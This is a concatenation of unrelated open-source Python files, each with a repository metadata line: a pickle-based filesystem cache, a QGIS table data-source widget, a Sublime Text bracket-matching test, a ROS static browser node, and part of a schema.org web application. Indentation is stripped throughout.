def __init__(self, value, expiration=None):
"""
Creates a new :class:`phyles.CacheObject` with an attribute
``value`` that is object passed by the `value` parameter. The
`expiration` should be the number of seconds since the epoch.
See the python :py:mod:`time` module for a discussion of the
epoch. If `expiration` is excluded, the the :class:`CacheObject`
object has no expiration.
"""
self._value = value
self._expiration = expiration
def get_value(self):
return self._value
def get_expiration(self):
return self._expiration
def expired(self):
"""
Returns ``True`` if the :class:`CacheObject` object has
expired according to the system time.
If the :class:`CacheObject` has an expiration of ``None``,
then ``False`` is returned.
"""
if self.expiration is None:
r = False
else:
r = (self.expiration < time.time())
return r
value = property(get_value)
expiration = property(get_expiration)
class FSCache(object):
"""
A class that manages a filesystem cache. Works like
a dictionary and can decorate functions to make them
cached.
A :class:`pyfscache.FSCache` object is instantiated
with a `path` and optional lifetime keyword arguments:
.. code-block:: python
>>> c = FSCache('cache/dir', days=7)
This command creates a new FSCache instance at the given
`path` (``cache/dir``). Each item added by this cache
has a lifetime of 7 days, starting when the item (not the cache)
is created. If the `path` doesn't exist,
one is made. New items added to the cache are given a lifetime
expressed by the keyword arguments with potential keys of
``years``, ``months``, ``weeks``, ``days``,
``hours``, ``minutes``, ``seconds`` (see :func:`to_seconds`).
If no keyword arguments are given, then the
items added by the cache do not expire automatically.
Creating an :class:`pyfscache.FSCache` object does not purge
the cache in `path` if the cache already exists. Instead,
the :class:`pyfscache.FSCache` object will begin to use the
cache, loading items and storing items as necessary.
.. code-block:: python
>>> import os
>>> import shutil
>>> from pyfscache import *
>>> if os.path.exists('cache/dir'):
... shutil.rmtree('cache/dir')
...
>>> c = FSCache('cache/dir', days=7)
>>> c['some_key'] = "some_value"
>>> c['some_key']
'some_value'
>>> os.listdir('cache/dir')
['PXBZzwEy3XnbOweuMtoPj9j=PwkfAsTXexmW2v05JD']
>>> c.expire('some_key')
>>> os.listdir('cache/dir')
[]
>>> c['some_key'] = "some_value"
>>> @c
... def doit(avalue):
... print "had to call me!"
... return "some other value"
...
>>> doit('some input')
had to call me!
'some other value'
>>> doit('some input')
'some other value'
>>> shutil.rmtree('cache/dir')
"""
def __init__(self, path, **kwargs):
"""
A :class:`pyfscache.FSCache` object is instantiated
with a `path` and optional lifetime keyword arguments:
.. code-block:: python
>>> c = FSCache('cache/dir', days=7)
Inits a new FSCache instance at the given `path`.
If the `path` doesn't exist, one is made. New objects
added to the cache are given a lifetime, expressed in the
keyword arguments `kwargs` with potential keys of
``years``, ``months``, ``weeks``, ``days``,
``hours``, ``minutes``, ``seconds``. See :func:`to_seconds`.
If no keyword arguments are given, then the lifetime
is considered to be infinite.
Creating a :class:`pyfscache.FSCache` object does not purge
the cache in `path` if the cache already exists. Instead,
the :class:`pyfscache.FSCache` object will begin to use the
cache, loading items and storing items as necessary.
"""
if kwargs:
self._lifetime = to_seconds(**kwargs)
if self._lifetime <= 0:
msg = "Lifetime (%s seconds) is 0 or less." % self._lifetime
raise LifetimeError, msg
else:
self._lifetime = None
self._loaded = {}
self._path = os.path.abspath(path)
if not os.path.exists(self._path):
os.makedirs(self._path)
def __getitem__(self, k):
"""
Returns the object stored for the key `k`. Will
load from the filesystem if not already loaded.
"""
if k in self:
digest = make_digest(k)
value = self._loaded[digest].value
else:
msg = "No such key in cache: '%s'" % k
raise KeyError(msg)
return value
def __setitem__(self, k, v):
"""
Sets the object `v` to the key `k` and saves the
object in the filesystem. This will raise an error
if an attempt is made to set an object for a key `k`
that already exists. To replace an item forcibly in this
way, use :func:`update`, or first use :func`expire`.
"""
digest = make_digest(k)
path = os.path.join(self._path, digest)
if (digest in self._loaded) or os.path.exists(path):
tmplt = ("Object for key `%s` exists\n." +
"Remove the old one before setting the new object.")
msg = tmplt % str(k)
raise CacheError, msg
else:
expiry = self.expiry()
contents = CacheObject(v, expiration=expiry)
dump(contents, path)
self._loaded[digest] = contents
def __delitem__(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove it from both the memory,
and the filesystem, use `expire`.
Synonymous with :func:`FSCache.unload`.
"""
digest = make_digest(k)
if digest in self._loaded:
del(self._loaded[digest])
else:
msg = "Object for key `%s` has not been loaded" % str(k)
raise CacheError, msg
def __contains__(self, k):
"""
Returns ``True`` if an object keyed by `k` is
in the cache on the file system, ``False`` otherwise.
"""
digest = make_digest(k)
if digest in self._loaded:
contents = self._loaded[digest]
isin = True
else:
try:
contents = self._load(digest, k)
isin = True
except CacheError:
isin = False
if isin:
if contents.expired():
self.expire(k)
isin = False
return isin
def __call__(self, f):
"""
Returns a cached function from function `f` using `self`
as the cache. See :func:`auto_cache_function`.
Imbues an :class:`FSCache` object with the ability to
be a caching decorator.
>>> acache = FSCache('cache-dir')
>>> @acache
... def cached_by_decorator(a, b, c):
... return list(a, b, c)
...
>>> cached_by_decorator(1, 2, 3)
[1, 2, 3]
>>> cached_by_decorator(1, 2, 3)
[1, 2, 3]
"""
return auto_cache_function(f, self)
def _load(self, digest, k):
"""
Loads the :class:`CacheObject` keyed by `k` from the
file system (residing in a file named by `digest`)
and returns the object.
This method is part of the implementation of :class:`FSCache`,
so don't use it as part of the API.
"""
path = os.path.join(self._path, digest)
if os.path.exists(path):
contents = load(path)
else:
msg = "Object for key `%s` does not exist." % (k,)
raise CacheError, msg
self._loaded[digest] = contents
return contents
def _remove(self, k):
"""
Removes the cache item keyed by `k` from the file system.
This method is part of the implementation of :class:`FSCache`,
so don't use it as part of the API.
"""
digest = make_digest(k)
path = os.path.join(self._path, digest)
if os.path.exists(path):
os.remove(path)
else:
msg = "No object for key `%s` stored." % str(k)
raise CacheError, msg
def is_loaded(self, k):
"""
Returns ``True`` if the item keyed by `k` has been loaded,
``False`` if not.
"""
digest = make_digest(k)
return digest in self._loaded
def unload(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove the object
keyed by `k` from both memory and permanently from the
filesystem, use `expire`.
Synonymous with deleting an item.
"""
del self[k]
def expire(self, k):
"""
Use with care. This permanently removes the object keyed
by `k` from the cache, both in the memory and in the filesystem.
"""
self._remove(k)
del self[k]
def get_path(self):
"""
Returns the absolute path to the file system cache represented
by the instance.
"""
return self._path
def get_lifetime(self):
"""
Returns the lifetime, in seconds, of new items in the cache.
If new items do not expire, then ``None`` is returned.
"""
return self._lifetime
def update_item(self, k, v):
"""
Use with care. Updates, both in memory and on the filesystem,
the object for key `k` with the object `v`. If the key `k`
already exists with a stored object, it will be replaced.
"""
self.expire(k)
self[k] = v
def load(self, k):
"""
Causes the object keyed by `k` to be loaded from the
file system and returned. It therefore causes this object
to reside in memory.
"""
return self[k]
def unload(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove it from both
memory and permanently from the filesystem, use `expire`.
"""
digest = make_digest(k)
if digest in self._loaded:
del(self._loaded[digest])
def get_loaded(self):
"""
Returns a list of keys for all objects that are loaded.
"""
return self._loaded.keys()
def get_names(self):
"""
Returns the names of the files in the cache on the
filesystem. These are not keys but one-way hashes
(or "digests") of the keys created by :func:`make_digest`.
"""
return os.listdir(self._path)
def clear(self):
"""
Unloads all loaded cache items from memory.
All cache items remain on the disk, however.
"""
self._loaded.clear()
def purge(self):
"""
Be careful, this empties the cache from both the filesystem
and memory!
"""
files = os.listdir(self._path)
for f in files:
path = os.path.join(self._path, f)
os.remove(path)
self.clear()
def expiry(self):
"""
Returns an expiry for the cache in seconds as if the start
of the expiration period were the moment at which this
the method is called.
>>> import time
>>> c = FSCache('cache/dir', seconds=60)
>>> round(c.expiry() - time.time(), 3)
60.0
"""
if self.lifetime is None:
x = None
else:
x = self.lifetime + time.time()
return x
path = property(get_path)
lifetime = property(get_lifetime)
def make_digest(k):
"""
Creates a digest suitable for use within an :class:`phyles.FSCache`
object from the key object `k`.
>>> adict = {'a' : {'b':1}, 'f': []}
>>> make_digest(adict)
'a2VKynHgDrUIm17r6BQ5QcA5XVmqpNBmiKbZ9kTu0A'
"""
s = cPickle.dumps(k)
h = hashlib.sha256(s).digest()
b64 = base64.urlsafe_b64encode(h)[:-2]
return b64.replace('-', '=')
def load(filename):
"""
Helper function that simply pickle loads the first object
from the file named by `filename`.
"""
f = open(filename, 'rb')
obj = cPickle.load(f)
f.close()
return obj
def dump(obj, filename):
"""
Helper function that simply pickle dumps the object
into the file named by `filename`.
"""
f = open(filename, 'wb')
cPickle.dump(obj, f, cPickle.HIGHEST_PROTOCOL)
f.close()
def auto_cache_function(f, cache):
"""
Creates a cached function from function `f`.
The `cache` can be any mapping object, such as `FSCache` objects.
The function arguments are expected to be well-behaved
for python's :py:mod:`cPickle`. Or, in other words,
the expected values for the parameters (the arguments) should
be instances new-style classes (i.e. inheriting from
:class:`object`) or implement :func:`__getstate__` with
well-behaved results.
If the arguments to `f` are not expected to be well-behaved,
it is best to use `cache_function` instead and create a custom keyer.
"""
m = inspect.getmembers(f)
try:
fid = (f.func_name, inspect.getargspec(f))
except (AttributeError, TypeError):
fid = (f.__name__, repr(type(f)))
def _f(*args, **kwargs):
k = (fid, args, kwargs)
if k in cache:
result = cache[k]
else:
result = f(*args, **kwargs)
cache[k] = result
return result
return _f
def cache_function(f, keyer, cache):
"""
Takes any function `f` and a function that creates a key,
`keyer` and caches the result in `cache`.
The keys created by `keyer` should be well behaved for
python's :py:mod:`cPickle`. See the documentation for
  :func:`auto_cache_function` for details.
It is best to have a unique `keyer` for every function.
"""
def _f(*args, **kwargs):
k = keyer(*args, **kwargs)
if k in cache:
result = cache[k]
else:
result = f(*args, **kwargs)
cache[k] = result
return result
return _f
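# Hedged usage sketch for cache_function (added commentary; the keyer and the
# wrapped function below are illustrative, not part of this module):
#
#   cache = FSCache('cache/dir', hours=1)
#   def basename_key(path):
#     return ('load', os.path.basename(path))   # key only on the file's basename
#   cached_load = cache_function(load, basename_key, cache)
#
# Calls whose paths share a basename then reuse the same cached result.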
def years_to_seconds(years):
"""
Converts `years` to seconds.
"""
return 3.15569e7 * years
def months_to_seconds(months):
"""
Converts `months` to seconds.
"""
return 2.62974e6 * months
def weeks_to_seconds(weeks):
"""
Converts `weeks` to seconds.
"""
return 604800.0 * weeks
def days_to_seconds(days):
"""
Converts `days` to seconds.
"""
return 86400.0 * days
def hours_to_seconds(hours):
"""
Converts `hours` to seconds.
"""
return 3600.0 * hours
def minutes_to_seconds(minutes):
"""
Converts `minutes` to seconds.
"""
return 60.0 * minutes
def seconds_to_seconds(seconds):
"""
Converts `seconds` to seconds as a :class:`float`.
"""
return float(seconds)
TIME_CONVERTERS = {"years" : years_to_seconds,
"months" : months_to_seconds,
"weeks" : weeks_to_seconds,
"days" : days_to_seconds,
"hours" : hours_to_seconds,
"minutes" : minutes_to_seconds,
"seconds" : seconds_to_seconds}
def to_seconds(**kwargs):
"""
Converts keyword arguments to seconds.
The the keyword arguments can have the following keys:
- ``years`` (31,556,900 seconds per year)
- ``months`` (2,629,740 seconds per month)
- ``weeks`` (604,800 seconds per week)
- ``days`` (86,400 seconds per day)
- ``hours`` (3600 seconds per hour)
- ``minutes`` (60 seconds per minute)
- ``seconds``
>>> to_seconds(seconds=15, minutes=20)
1215.0
>>> to_seconds(seconds=15.42, hours=10, minutes=18, years=2)
63150895.42
"""
seconds = []
for k, v in kwargs.items():
if k in TIME_CONVERTERS:
seconds.append(TIME_CONVERTERS[k](v))
else:
msg = "Not a valid unit of time: '%s'" % k
raise TimeError(msg)
return sum(seconds)
| cfairbanks/calibre-comicvine | pyfscache/fscache.py | Python | mit | 15,558 |
"""
/***************************************************************************
Name                 : ComposerTableDataSourceEditor
Description : Widget for specifying data properties for tables in
the document designer.
Date : 5/January/2015
copyright : (C) 2014 by UN-Habitat and implementing partners.
See the accompanying file CONTRIBUTORS.txt in the root
email : stdm@unhabitat.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt import uic
from qgis.PyQt.QtWidgets import (
QApplication,
QWidget
)
from qgis.core import (
QgsLayoutFrame,
QgsProject
)
from stdm.composer.layout_utils import LayoutUtils
from stdm.data.pg_utils import (
vector_layer
)
from stdm.ui.composer.referenced_table_editor import LinkedTableProps
from stdm.ui.gui_utils import GuiUtils
from stdm.ui.notification import (
NotificationBar
)
WIDGET, BASE = uic.loadUiType(
GuiUtils.get_ui_file_path('composer/ui_composer_table_source.ui'))
class ComposerTableDataSourceEditor(WIDGET, BASE):
def __init__(self, frame_item, parent=None):
QWidget.__init__(self, parent)
self.setupUi(self)
if isinstance(frame_item, QgsLayoutFrame):
self._composer_table_item = frame_item.multiFrame()
else:
self._composer_table_item = frame_item
self._layout = self._composer_table_item.layout()
self._notif_bar = NotificationBar(self.vl_notification)
# Load fields if the data source has been specified
ds_name = LayoutUtils.get_stdm_data_source_for_layout(self._layout)
self.ref_table.load_data_source_fields(ds_name)
# Load source tables
self.ref_table.load_link_tables()
self.ref_table.set_layout(self._layout)
# self.ref_table.cbo_ref_table.currentIndexChanged[str].connect(self.set_table_vector_layer)
self.ref_table.cbo_ref_table.currentIndexChanged[str].connect(
self.set_table_vector_layer)
layer_name = self.current_table_layer_name()
idx = self.ref_table.cbo_ref_table.findText(layer_name)
self.ref_table.cbo_ref_table.setCurrentIndex(idx)
def composer_item(self):
return self._composer_table_item
def current_table_layer_name(self):
return self._composer_table_item.vectorLayer().name() if self._composer_table_item.vectorLayer() else ''
def set_table_vector_layer(self, table_name):
"""
Creates a vector layer and appends it to the composer table item.
:param table_name: Name of the linked table containing tabular
information.
:type table_name: str
"""
self._notif_bar.clear()
if not table_name:
return
v_layer = vector_layer(table_name)
if v_layer is None:
msg = QApplication.translate("ComposerTableDataSourceEditor",
"A vector layer could not be created from the table.")
self._notif_bar.insertErrorNotification(msg)
return
if not v_layer.isValid():
msg = QApplication.translate("ComposerTableDataSourceEditor",
"Invalid vector layer, the table will not be added.")
self._notif_bar.insertErrorNotification(msg)
return
# No need to add the layer in the legend
QgsProject.instance().addMapLayer(v_layer, False)
if len(self.composer_item().columns()) > 0:
self._composer_table_item.setVectorLayer(v_layer) # _composer_table_item is QgsComposerAttributeTable
self._composer_table_item.update()
def configuration(self):
from stdm.composer.table_configuration import TableConfiguration
linked_table_props = self.ref_table.properties()
table_config = TableConfiguration()
table_config.set_linked_table(linked_table_props.linked_table)
table_config.set_source_field(linked_table_props.source_field)
table_config.set_linked_column(linked_table_props.linked_field)
return table_config
def set_configuration(self, configuration):
# Load referenced table editor with item configuration settings.
table_props = LinkedTableProps(linked_table=configuration.linked_table(),
source_field=configuration.source_field(),
linked_field=configuration.linked_field())
self.ref_table.set_properties(table_props)
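    # Added commentary (not original code): configuration() and set_configuration()
    # round-trip the linked-table / source-field / linked-field settings, which lets
    # the document designer persist and later restore this table item's data source.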
| gltn/stdm | stdm/ui/composer/table_data_source.py | Python | gpl-2.0 | 5,385 |
import sublime
from unittest import TestCase
version = sublime.version()
class TestBracketGuard(TestCase):
def setUp(self):
self.view = sublime.active_window().new_file()
self.view.settings().set("is_test", True)
def tearDown(self):
if self.view:
self.view.set_scratch(True)
self.view.window().run_command("close_file")
def insertCodeAndGetRegions(self, code):
self.view.run_command("insert", {"characters": code})
return self.view.get_regions("BracketGuardRegions")
def testPureValidBrackets(self):
openerRegions = self.insertCodeAndGetRegions("([{}])")
self.assertEqual(len(openerRegions), 0)
def testValidBracketsInCode(self):
openerRegions = self.insertCodeAndGetRegions("a(bc[defg{hijkl}mn])o")
self.assertEqual(len(openerRegions), 0)
def testInvalidBracketsWrongCloser(self):
bracketGuardRegions = self.insertCodeAndGetRegions("({}])")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, 0)
self.assertEqual(bracketGuardRegions[1].a, 3)
def testInvalidBracketsNoCloser(self):
bracketGuardRegions = self.insertCodeAndGetRegions("({}")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, -1)
self.assertEqual(bracketGuardRegions[1].a, 0)
def testInvalidBracketsNoOpener(self):
bracketGuardRegions = self.insertCodeAndGetRegions("){}")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, -1)
self.assertEqual(bracketGuardRegions[1].a, 0)
| beni55/Sublime-BracketGuard | tests/testBracketGuard.py | Python | mit | 1,599 |
__author__ = 'kreitz'
| kennethreitz-archive/mead | mead/plugins/sitemap_xml/__init__.py | Python | isc | 22 |
#!/usr/bin/env python3
import rospy
from lg_common import ManagedBrowser, ManagedWindow
from lg_msg_defs.msg import ApplicationState, WindowGeometry
from lg_common.helpers import check_www_dependency, discover_host_from_url, discover_port_from_url
from lg_common.helpers import run_with_influx_exception_handler
from std_msgs.msg import String
NODE_NAME = 'static_browser'
def main():
rospy.init_node(NODE_NAME)
geometry = ManagedWindow.get_viewport_geometry()
url = rospy.get_param('~url', None)
command_line_args = rospy.get_param('~command_line_args', '')
scale_factor = rospy.get_param('~force_device_scale_factor', 1)
extra_logging = rospy.get_param('~extra_logging', False)
debug_port = rospy.get_param('~debug_port', None)
user_agent = rospy.get_param(
'~user_agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; '
'en-us AppleWebKit/531.21.10 (KHTML, like Gecko) ' +
'Version/4.0.4 Mobile/7B314 Safari/531.21.10'
)
state = rospy.get_param('~state', ApplicationState.VISIBLE)
extensions = rospy.get_param('~extensions', [])
kiosk = rospy.get_param('~kiosk', True)
global_dependency_timeout = rospy.get_param("/global_dependency_timeout", 15)
depend_on_url = rospy.get_param("~depend_on_url", False)
www_host = discover_host_from_url(url)
www_port = discover_port_from_url(url)
check_www_dependency(depend_on_url, www_host, www_port, 'static browser URL', global_dependency_timeout)
browser = ManagedBrowser(
geometry=geometry,
url=url,
command_line_args=command_line_args,
log_stderr=extra_logging,
force_device_scale_factor=scale_factor,
remote_debugging_port=debug_port,
user_agent=user_agent,
extensions=extensions,
kiosk=kiosk
)
browser.set_state(state)
rospy.Subscriber('{}/state'.format(rospy.get_name()), ApplicationState,
browser.handle_state_msg)
def handle_debug_sock_msg(msg):
browser.send_debug_sock_msg(msg.data)
rospy.Subscriber('{}/debug'.format(rospy.get_name()), String, handle_debug_sock_msg)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
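# Hedged usage note (added commentary): this node is normally launched by ROS and
# configured through its private parameters (~url, ~command_line_args, ~extensions,
# ~kiosk, ... as read above); at runtime it listens on the <node_name>/state and
# <node_name>/debug topics to change browser visibility and send debug messages.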
| EndPointCorp/lg_ros_nodes | lg_common/scripts/static_browser.py | Python | apache-2.0 | 2,261 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import re
import webapp2
import jinja2
import logging
import StringIO
from markupsafe import Markup, escape # https://pypi.python.org/pypi/MarkupSafe
import parsers
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.api import users
from google.appengine.ext.webapp import blobstore_handlers
from api import inLayer, read_file, full_path, read_schemas, read_extensions, read_examples, namespaces, DataCache
from api import Unit, GetTargets, GetSources
from api import GetComment, all_terms, GetAllTypes, GetAllProperties
from api import GetParentList, GetImmediateSubtypes, HasMultipleBaseTypes
from api import GetJsonLdContext
logging.basicConfig(level=logging.INFO) # dev_appserver.py --log_level debug .
log = logging.getLogger(__name__)
SCHEMA_VERSION=2.1
sitemode = "mainsite" # whitespaced list for CSS tags,
# e.g. "mainsite testsite" when off expected domains
# "extensionsite" when in an extension (e.g. blue?)
releaselog = { "2.0": "2015-05-13", "2.1": "2015-08-06" }
#
host_ext = ""
myhost = ""
myport = ""
mybasehost = ""
silent_skip_list = [ "favicon.ico" ] # Do nothing for now
all_layers = {}
ext_re = re.compile(r'([^\w,])+')
PageCache = {}
#TODO: Modes:
# mainsite
# webschemadev
# known extension (not skiplist'd, eg. demo1 on schema.org)
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),
extensions=['jinja2.ext.autoescape'], autoescape=True, cache_size=0)
ENABLE_JSONLD_CONTEXT = True
ENABLE_CORS = True
ENABLE_HOSTED_EXTENSIONS = True
EXTENSION_SUFFIX = "" # e.g. "*"
ENABLED_EXTENSIONS = [ 'admin', 'auto', 'bib' ]
ALL_LAYERS = [ 'core', 'admin', 'auto', 'bib' ]
debugging = False
# debugging = True
def cleanPath(node):
"""Return the substring of a string matching chars approved for use in our URL paths."""
return re.sub(r'[^a-zA-Z0-9\-/,\.]', '', str(node), flags=re.DOTALL)
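# Illustrative example (added commentary): cleanPath("docs/Thing?x=1") returns
# "docs/Thingx1" -- every character outside [a-zA-Z0-9], "-", "/", "," and "." is
# stripped.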
class HTMLOutput:
"""Used in place of http response when we're collecting HTML to pass to template engine."""
def __init__(self):
self.outputStrings = []
def write(self, str):
self.outputStrings.append(str)
def toHTML(self):
return Markup ( "".join(self.outputStrings) )
def __str__(self):
return self.toHTML()
# Core API: we have a single schema graph built from triples and units.
# now in api.py
class TypeHierarchyTree:
def __init__(self, prefix=""):
self.txt = ""
self.visited = {}
self.prefix = prefix
def emit(self, s):
self.txt += s + "\n"
def toHTML(self):
return '%s<ul>%s</ul>' % (self.prefix, self.txt)
def toJSON(self):
return self.txt
def traverseForHTML(self, node, depth = 1, hashorslash="/", layers='core'):
"""Generate a hierarchical tree view of the types. hashorslash is used for relative link prefixing."""
log.debug("traverseForHTML: node=%s hashorslash=%s" % ( node.id, hashorslash ))
urlprefix = ""
home = node.getHomeLayer()
if home in ENABLED_EXTENSIONS and home != getHostExt():
urlprefix = makeUrl(home)
extclass = ""
extflag = ""
tooltip=""
if home != "core" and home != "":
extclass = "class=\"ext ext-%s\"" % home
extflag = EXTENSION_SUFFIX
tooltip = "title=\"Extended schema: %s.schema.org\" " % home
# we are a supertype of some kind
if len(node.GetImmediateSubtypes(layers=layers)) > 0:
# and we haven't been here before
if node.id not in self.visited:
self.visited[node.id] = True # remember our visit
self.emit( ' %s<li class="tbranch" id="%s"><a %s %s href="%s%s%s">%s</a>%s' % (" " * 4 * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag) )
self.emit(' %s<ul>' % (" " * 4 * depth))
# handle our subtypes
for item in node.GetImmediateSubtypes(layers=layers):
self.traverseForHTML(item, depth + 1, hashorslash=hashorslash, layers=layers)
self.emit( ' %s</ul>' % (" " * 4 * depth))
else:
# we are a supertype but we visited this type before, e.g. saw Restaurant via Place then via Organization
seen = ' <a href="#%s">+</a> ' % node.id
self.emit( ' %s<li class="tbranch" id="%s"><a %s %s href="%s%s%s">%s</a>%s%s' % (" " * 4 * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag, seen) )
# leaf nodes
if len(node.GetImmediateSubtypes(layers=layers)) == 0:
if node.id not in self.visited:
self.emit( '%s<li class="tleaf" id="%s"><a %s %s href="%s%s%s">%s</a>%s%s' % (" " * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag, "" ))
#else:
#self.visited[node.id] = True # never...
# we tolerate "VideoGame" appearing under both Game and SoftwareApplication
# and would only suppress it if it had its own subtypes. Seems legit.
self.emit( ' %s</li>' % (" " * 4 * depth) )
# based on http://danbri.org/2013/SchemaD3/examples/4063550/hackathon-schema.js - thanks @gregg, @sandro
def traverseForJSONLD(self, node, depth = 0, last_at_this_level = True, supertype="None", layers='core'):
emit_debug = False
if node.id in self.visited:
# self.emit("skipping %s - already visited" % node.id)
return
self.visited[node.id] = True
p1 = " " * 4 * depth
if emit_debug:
self.emit("%s# @id: %s last_at_this_level: %s" % (p1, node.id, last_at_this_level))
global namespaces;
ctx = "{}".format(""""@context": {
"rdfs": "http://www.w3.org/2000/01/rdf-schema#",
"schema": "http://schema.org/",
"rdfs:subClassOf": { "@type": "@id" },
"name": "rdfs:label",
"description": "rdfs:comment",
"children": { "@reverse": "rdfs:subClassOf" }
},\n""" if last_at_this_level and depth==0 else '' )
unseen_subtypes = []
for st in node.GetImmediateSubtypes(layers=layers):
if not st.id in self.visited:
unseen_subtypes.append(st)
unvisited_subtype_count = len(unseen_subtypes)
subtype_count = len( node.GetImmediateSubtypes(layers=layers) )
supertx = "{}".format( '"rdfs:subClassOf": "schema:%s", ' % supertype.id if supertype != "None" else '' )
maybe_comma = "{}".format("," if unvisited_subtype_count > 0 else "")
comment = GetComment(node, layers).strip()
comment = comment.replace('"',"'")
comment = re.sub('<[^<]+?>', '', comment)[:60]
self.emit('\n%s{\n%s\n%s"@type": "rdfs:Class", %s "description": "%s...",\n%s"name": "%s",\n%s"@id": "schema:%s"%s'
% (p1, ctx, p1, supertx, comment, p1, node.id, p1, node.id, maybe_comma))
i = 1
if unvisited_subtype_count > 0:
self.emit('%s"children": ' % p1 )
self.emit(" %s[" % p1 )
inner_lastness = False
for t in unseen_subtypes:
if emit_debug:
self.emit("%s # In %s > %s i: %s unvisited_subtype_count: %s" %(p1, node.id, t.id, i, unvisited_subtype_count))
if i == unvisited_subtype_count:
inner_lastness = True
i = i + 1
self.traverseForJSONLD(t, depth + 1, inner_lastness, supertype=node, layers=layers)
self.emit("%s ]%s" % (p1, "{}".format( "" if not last_at_this_level else '' ) ) )
maybe_comma = "{}".format( ',' if not last_at_this_level else '' )
self.emit('\n%s}%s\n' % (p1, maybe_comma))
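# Hedged usage sketch (added commentary, not original code): a typical caller builds
# the full hierarchy starting from the root type, e.g.
#
#   tree = TypeHierarchyTree("<h3>Type hierarchy</h3>")
#   tree.traverseForHTML(Unit.GetUnit("Thing"), layers=ALL_LAYERS)
#   html = tree.toHTML()
#
# The prefix string and the choice of root node are illustrative assumptions.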
def GetExamples(node, layers='core'):
"""Returns the examples (if any) for some Unit node."""
return node.examples
def GetExtMappingsRDFa(node, layers='core'):
"""Self-contained chunk of RDFa HTML markup with mappings for this term."""
if (node.isClass()):
equivs = GetTargets(Unit.GetUnit("owl:equivalentClass"), node, layers=layers)
if len(equivs) > 0:
markup = ''
for c in equivs:
if (c.id.startswith('http')):
markup = markup + "<link property=\"owl:equivalentClass\" href=\"%s\"/>\n" % c.id
else:
markup = markup + "<link property=\"owl:equivalentClass\" resource=\"%s\"/>\n" % c.id
return markup
if (node.isAttribute()):
equivs = GetTargets(Unit.GetUnit("owl:equivalentProperty"), node, layers)
if len(equivs) > 0:
markup = ''
for c in equivs:
markup = markup + "<link property=\"owl:equivalentProperty\" href=\"%s\"/>\n" % c.id
return markup
return "<!-- no external mappings noted for this term. -->"
class ShowUnit (webapp2.RequestHandler):
"""ShowUnit exposes schema.org terms via Web RequestHandler
(HTML/HTTP etc.).
"""
# def __init__(self):
# self.outputStrings = []
def emitCacheHeaders(self):
"""Send cache-related headers via HTTP."""
self.response.headers['Cache-Control'] = "public, max-age=43200" # 12h
self.response.headers['Vary'] = "Accept, Accept-Encoding"
def GetCachedText(self, node, layers='core'):
"""Return page text from node.id cache (if found, otherwise None)."""
global PageCache
cachekey = "%s:%s" % ( layers, node.id ) # was node.id
if (cachekey in PageCache):
return PageCache[cachekey]
else:
return None
def AddCachedText(self, node, textStrings, layers='core'):
"""Cache text of our page for this node via its node.id.
We can be passed a text string or an array of text strings.
"""
global PageCache
cachekey = "%s:%s" % ( layers, node.id ) # was node.id
outputText = "".join(textStrings)
log.debug("CACHING: %s" % node.id)
PageCache[cachekey] = outputText
return outputText
def write(self, str):
"""Write some text to Web server's output stream."""
self.outputStrings.append(str)
def moreInfoBlock(self, node, layer='core'):
# if we think we have more info on this term, show a bulleted list of extra items.
# defaults
bugs = ["No known open issues."]
mappings = ["No recorded schema mappings."]
items = bugs + mappings
items = [
"<a href='https://github.com/schemaorg/schemaorg/issues?q=is%3Aissue+is%3Aopen+{0}'>Check for open issues.</a>".format(node.id)
]
for l in all_terms[node.id]:
l = l.replace("#","")
if ENABLE_HOSTED_EXTENSIONS:
items.append("'{0}' is mentioned in extension layer: <a href='?ext={1}'>{2}</a>".format( node.id, l, l ))
moreinfo = """<div>
<div id='infobox' style='text-align: right;'><b><span style="cursor: pointer;">[more...]</span></b></div>
<div id='infomsg' style='display: none; background-color: #EEEEEE; text-align: left; padding: 0.5em;'>
<ul>"""
for i in items:
moreinfo += "<li>%s</li>" % i
# <li>mappings to other terms.</li>
# <li>or links to open issues.</li>
moreinfo += """</ul>
</div>
</div>
<script type="text/javascript">
$("#infobox").click(function(x) {
element = $("#infomsg");
if (! $(element).is(":visible")) {
$("#infomsg").show(300);
} else {
$("#infomsg").hide(300);
}
});
</script>"""
return moreinfo
def GetParentStack(self, node, layers='core'):
"""Returns a hiearchical structured used for site breadcrumbs."""
thing = Unit.GetUnit("Thing")
if (node not in self.parentStack):
self.parentStack.append(node)
if (Unit.isAttribute(node, layers=layers)):
self.parentStack.append(Unit.GetUnit("Property"))
self.parentStack.append(thing)
sc = Unit.GetUnit("rdfs:subClassOf")
if GetTargets(sc, node, layers=layers):
for p in GetTargets(sc, node, layers=layers):
self.GetParentStack(p, layers=layers)
else:
# Enumerations are classes that have no declared subclasses
sc = Unit.GetUnit("typeOf")
for p in GetTargets(sc, node, layers=layers):
self.GetParentStack(p, layers=layers)
#Put 'Thing' to the end for multiple inheritance classes
if(thing in self.parentStack):
self.parentStack.remove(thing)
self.parentStack.append(thing)
def ml(self, node, label='', title='', prop='', hashorslash='/'):
"""ml ('make link')
Returns an HTML-formatted link to the class or property URL
* label = optional anchor text label for the link
* title = optional title attribute on the link
* prop = an optional property value to apply to the A element
"""
if(node.id == "DataType"): #Special case
return "<a href=\"%s\">%s</a>" % (node.id, node.id)
if label=='':
label = node.id
if title != '':
title = " title=\"%s\"" % (title)
if prop:
prop = " property=\"%s\"" % (prop)
urlprefix = ""
